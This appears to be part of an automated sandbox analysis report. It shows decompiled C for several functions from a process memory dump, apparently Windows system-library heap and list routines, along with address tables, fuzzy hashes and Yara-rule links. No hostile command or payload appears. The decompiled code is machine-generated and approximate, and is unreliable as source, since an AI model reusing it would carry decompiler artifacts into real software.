0x1e4213a6
0x1e4213ac
0x1e4213b2
0x1e4213b5
0x1e4213bc
0x1e4213bf
0x1e4213c2
0x1e4213c5
0x1e4213c8
0x1e4213cb
0x1e4213ce
0x1e4213d1
0x1e4213d4
0x1e4213d7
0x1e4213da
0x1e4213dd
0x1e4213e0
0x1e4213e3
0x1e4213e6
0x1e4213e9
0x1e4213f6
0x1e421400
0x1e421400
0x1e3e8f08
0x1e3e8f32

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf06b99cd87dd219509e547f26fcff58fb9568c12ba4100e5dc263de8c4f510
Instruction ID: 6233480901a440adc8a0eff1511ed0e4fa63d5eecc1b8813fbea843af91b22d0
Opcode Fuzzy Hash: cbf06b99cd87dd219509e547f26fcff58fb9568c12ba4100e5dc263de8c4f510
Instruction Fuzzy Hash: 0441A3B5D00368DFDB24CFAAE980AADFBF9BB48710F5042AEE509A7600D7745A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1E3DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E1E3E9670() < 0) {
					E1E3FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1e497b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L1E3C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M1E3DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x1e3de730
0x1e3de736
0x1e3de738
0x1e3de73d
0x1e3de73e
0x1e3de740
0x1e3de749
0x1e3de765
0x1e3de76a
0x1e3de76b
0x1e3de76c
0x1e3de76d
0x1e3de76e
0x1e3de76f
0x1e3de775
0x1e3de777
0x1e3de77e
0x1e41b675
0x1e3de784
0x1e3de784
0x1e3de789
0x1e3de7a8
0x1e3de7ac
0x1e3de807
0x1e3de7ae
0x1e3de7ae
0x1e3de7b1
0x1e3de7b4
0x1e3de7b9
0x1e3de7c0
0x1e3de7c4
0x1e3de7ca
0x1e3de7cc
0x00000000
0x1e3de7d3
0x1e3de7d6
0x00000000
0x00000000
0x1e3de7ff
0x1e3de802
0x00000000
0x00000000
0x1e3de7f9
0x1e3de7fc
0x00000000
0x00000000
0x1e3de7f3
0x1e3de7f6
0x00000000
0x00000000
0x1e3de7ed
0x1e3de7f0
0x00000000
0x00000000
0x1e3de7e7
0x1e3de7ea
0x00000000
0x00000000
0x1e41b685
0x1e41b688
0x00000000
0x00000000
0x1e41b682
0x00000000
0x00000000
0x1e3de7cc
0x1e3de7d9
0x1e3de7dc
0x1e3de7de
0x1e3de7de
0x1e3de7ac
0x1e3de7e4
0x1e3de74b
0x1e3de751
0x1e3de759
0x1e3de761
0x1e3de761

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3351412a1d9f92edebeec3a7cd26471e9babc6dadd7f0b09463d36870cf2fe40
Instruction ID: 8bac637a7c9989893abab33942b7a317fa843acaeab09094a2159474f8345207
Opcode Fuzzy Hash: 3351412a1d9f92edebeec3a7cd26471e9babc6dadd7f0b09463d36870cf2fe40
Instruction Fuzzy Hash: 28318C75A14349EFD744CF59C840B86BBE8FB08224F548666F908CB341D631E894CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1E3DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1e496100; // 0x66
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E1E3C2280(0xd, 0x976ef1a0);
				_t41 =  *0x1e4960f8; // 0x0
				if(_t41 != 0) {
					 *0x1e4960f8 =  *_t41;
					 *0x1e4960fc =  *0x1e4960fc + 0xffff;
				}
				E1E3BFFB0(_t41, 0x800, 0x976ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1e4960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L1E3C4620(0x1e496100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1e496100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x1e3dbc36
0x1e3dbc42
0x1e3dbc45
0x1e3dbc4a
0x1e3dbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3dbc50
0x1e3dbc50
0x1e3dbc58
0x1e3dbc5a
0x1e3dbc60
0x00000000
0x00000000
0x1e41a4f2
0x1e41a4f6
0x00000000
0x00000000
0x00000000
0x1e41a4fc
0x1e3dbc79
0x1e3dbc7e
0x1e3dbc86
0x1e3dbd16
0x1e3dbd20
0x1e3dbd20
0x1e3dbc8d
0x1e3dbc94
0x1e3dbcbd
0x1e3dbcca
0x1e3dbccb
0x1e3dbccc
0x1e3dbccd
0x1e3dbcce
0x1e3dbcd4
0x1e3dbcea
0x1e3dbcee
0x1e3dbcf2
0x1e3dbd00
0x1e3dbd04
0x00000000
0x1e3dbc96
0x1e3dbcab
0x1e3dbcaf
0x1e3dbd2c
0x1e3dbd2c
0x1e3dbd09
0x00000000
0x1e3dbd09
0x1e3dbcb1
0x1e3dbcb5
0x1e3dbcbb
0x00000000
0x00000000
0x00000000
0x1e3dbcbb

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742f1c47aa4e2596f09131cec942b08811daecdedf79a8704404f31506c90b28
Instruction ID: 9d7f2f12c757fea9ba3a09603871826a8632cff0be7f5336c516ac625a7a4694
Opcode Fuzzy Hash: 742f1c47aa4e2596f09131cec942b08811daecdedf79a8704404f31506c90b28
Instruction Fuzzy Hash: AC31DD36A107669BCB05DF59D4C179673A8FB28310F8142B9EC49EB205EB74EA09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1E3D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1E3CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L1E3C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1E3CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x1e3d1dc2
0x1e3d1dc5
0x1e3d1dc7
0x1e3d1dcc
0x1e3d1dce
0x1e3d1dd6
0x1e3d1ddf
0x1e3d1de0
0x1e3d1de1
0x1e3d1de5
0x1e3d1de8
0x1e3d1def
0x1e3d1df0
0x1e3d1df6
0x1e3d1df7
0x1e3d1dfe
0x1e3d1e1a
0x00000000
0x00000000
0x1e3d1e0b
0x1e3d1e12
0x1e3d1e12
0x1e3d1e00
0x1e3d1e00
0x1e3d1e05
0x1e3d1e1e
0x1e3d1e23
0x1e41570f
0x1e415713
0x00000000
0x00000000
0x1e415719
0x1e415719
0x1e3d1e2c
0x1e3d1e2d
0x1e3d1e2e
0x1e3d1e2f
0x1e3d1e31
0x1e3d1e32
0x1e3d1e35
0x1e3d1e3d
0x1e415723
0x1e41573d
0x1e41573d
0x00000000
0x1e415723
0x1e3d1e49
0x1e3d1e4e
0x1e3d1e4e
0x1e3d1e09
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: af78c1adbf55c42ce9504b7e2818c6bdb90a464388f49453759ac91c598f0806
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: E9219C76A00219EFC711CF9ACC90EAABBBDFF85680F514256E9059B210D634EE55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E426C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1E426C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1E3C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1e497b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L1E3C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1E3EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1E3C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1E3E9AE0();
						_t23 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x1e426c0a
0x1e426c0f
0x1e426c10
0x1e426c13
0x1e426c15
0x1e426c19
0x1e426c1c
0x1e426c21
0x1e426c28
0x1e426c3a
0x1e426c2a
0x1e426c33
0x1e426c33
0x1e426c3f
0x1e426c48
0x1e426c4d
0x1e426c60
0x1e426c65
0x1e426c69
0x1e426c73
0x1e426c79
0x1e426c7f
0x1e426c86
0x1e426c90
0x1e426c94
0x1e426ca6
0x1e426cb2
0x1e426cbd
0x1e426cbd
0x1e426cc3
0x1e426cc7
0x1e426ccb
0x1e426cd0
0x1e426cd1
0x1e426ce2
0x1e426ce2
0x1e426c69
0x1e426ced

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f9af15a749449a129172f43c1e9e08b2af9d368a9500fcca48f9bc03ab7ad4
Instruction ID: 4abe1995873eb3c017561d587735fa7d5e58dacef5a3f0cfe2159eea573ff14c
Opcode Fuzzy Hash: 73f9af15a749449a129172f43c1e9e08b2af9d368a9500fcca48f9bc03ab7ad4
Instruction Fuzzy Hash: F921ABB5A00684AFC711DB69D880E2AB7B8FF48744F0002AAF905D7B91D734ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1E3E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E1E3FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1E3DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L1E3C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1E3EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1E3DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x1e3e90af
0x1e3e90b8
0x1e3e90bb
0x1e3e90bf
0x1e3e90c2
0x1e3e90c2
0x1e3e90c8
0x1e3e90cb
0x1e3e90cd
0x1e4214d7
0x1e4214eb
0x1e4214eb
0x00000000
0x1e4214eb
0x1e4214db
0x1e4214e6
0x00000000
0x1e4214f2
0x1e4214e8
0x00000000
0x1e4214e8
0x1e3e90d8
0x1e3e90da
0x1e3e90dd
0x1e3e90e5
0x00000000
0x1e3e9139
0x1e3e90fa
0x1e3e90fe
0x1e3e9142
0x00000000
0x1e3e9142
0x1e3e9104
0x1e3e9107
0x1e3e910b
0x1e3e9110
0x1e3e9118
0x1e3e9147
0x1e3e9148
0x1e3e914f
0x1e3e9150
0x1e3e9151
0x1e3e9152
0x1e3e9156
0x1e3e915d
0x1e3e9160
0x1e3e9168
0x1e3e916c
0x1e3e91bc
0x1e3e91be
0x00000000
0x1e3e91be
0x1e3e916e
0x1e3e9173
0x1e3e9176
0x00000000
0x00000000
0x1e3e917c
0x1e3e9180
0x1e3e91b5
0x00000000
0x1e3e91b5
0x1e3e9182
0x1e3e9185
0x1e3e9189
0x00000000
0x00000000
0x1e3e918e
0x1e3e9190
0x1e3e9198
0x00000000
0x00000000
0x1e3e91a0
0x00000000
0x1e3e91ad
0x1e3e91ad
0x1e3e91b0
0x1e3e91b1
0x00000000
0x1e3e9185
0x1e3e911a
0x1e3e911c
0x1e3e911f
0x1e3e9125
0x1e3e9127
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 05cfe4c38beee53a0a2513b47c373db0cd1374ba6ecee6462ed542b54e01e158
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 372180B5A00355EFD720CF59C844A5AB7F8EF48350F158ABAE949A7700D370ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1E3D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x1e4984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x1e4984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1e4984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E1E3EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E1E3EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1e4984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x1e4984c4; // 0x0
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x1e3d3b89
0x1e3d3b96
0x1e3d3ba1
0x1e3d3bab
0x1e3d3bb5
0x1e3d3bb9
0x1e416298
0x1e3d3bbf
0x1e3d3bc2
0x1e3d3bc3
0x1e3d3bc9
0x1e3d3bca
0x1e3d3bcc
0x1e3d3bcd
0x1e3d3bd4
0x1e3d3bd6
0x1e3d3bdb
0x1e3d3bea
0x1e3d3bf7
0x1e3d3bfb
0x1e3d3bff
0x1e3d3c09
0x1e3d3c0a
0x1e3d3c0b
0x1e3d3c0f
0x1e3d3c14
0x1e3d3c18
0x1e3d3c18
0x1e3d3bfb
0x1e3d3c1b
0x1e3d3c30
0x1e3d3c30
0x1e3d3c3d

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56dee806a0e54eb86a67541a3739c44ea9e65fcfb711e8122cb8542286fec27
Instruction ID: baecd6af0c32641058c4e193e130eda517e4112f2eb20cbae3397627ca48857a
Opcode Fuzzy Hash: c56dee806a0e54eb86a67541a3739c44ea9e65fcfb711e8122cb8542286fec27
Instruction Fuzzy Hash: 39219272A00218EFD704CF98DD81B5AB7BDFF44708F150669E904AB251D371ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E426CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1E426CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E1E3C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E1E3C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1e385c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E1E3DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E1E3DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E1E427016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L1E3C2400( &_v52);
								}
								_t21 = L1E3C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x1e426cfb
0x1e426d00
0x1e426d02
0x1e426d06
0x1e426d0a
0x1e426d0e
0x1e426d19
0x1e426d2b
0x1e426d1b
0x1e426d24
0x1e426d24
0x1e426d33
0x1e426d39
0x1e426d46
0x1e426d4f
0x1e426d61
0x1e426d51
0x1e426d5a
0x1e426d5a
0x1e426d69
0x1e426d6b
0x1e426d6d
0x1e426d6f
0x1e426d6f
0x1e426d74
0x1e426d79
0x1e426d7a
0x1e426d7f
0x1e426d82
0x1e426d88
0x1e426d89
0x1e426d90
0x1e426d94
0x1e426da7
0x1e426db1
0x1e426db1
0x1e426dbb
0x1e426dbb
0x1e426d90
0x1e426d69
0x1e426d46
0x1e426dc6

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7907796c5140845933d70a1fb22788b3b115e04b920a2aa5bff5083879413ad1
Instruction ID: 64759bcf58c06e9c197f86e0f3a82b74a5d2c875dc067d0fc887858d7fad4875
Opcode Fuzzy Hash: 7907796c5140845933d70a1fb22788b3b115e04b920a2aa5bff5083879413ad1
Instruction Fuzzy Hash: 5521F27291078A9BC301DF29E944B5BB7EDEF81644F840AA7F940C7251EB34E909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1E472EF7, Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E1E472EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x1e49d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E1E3ED0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E1E3ED0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
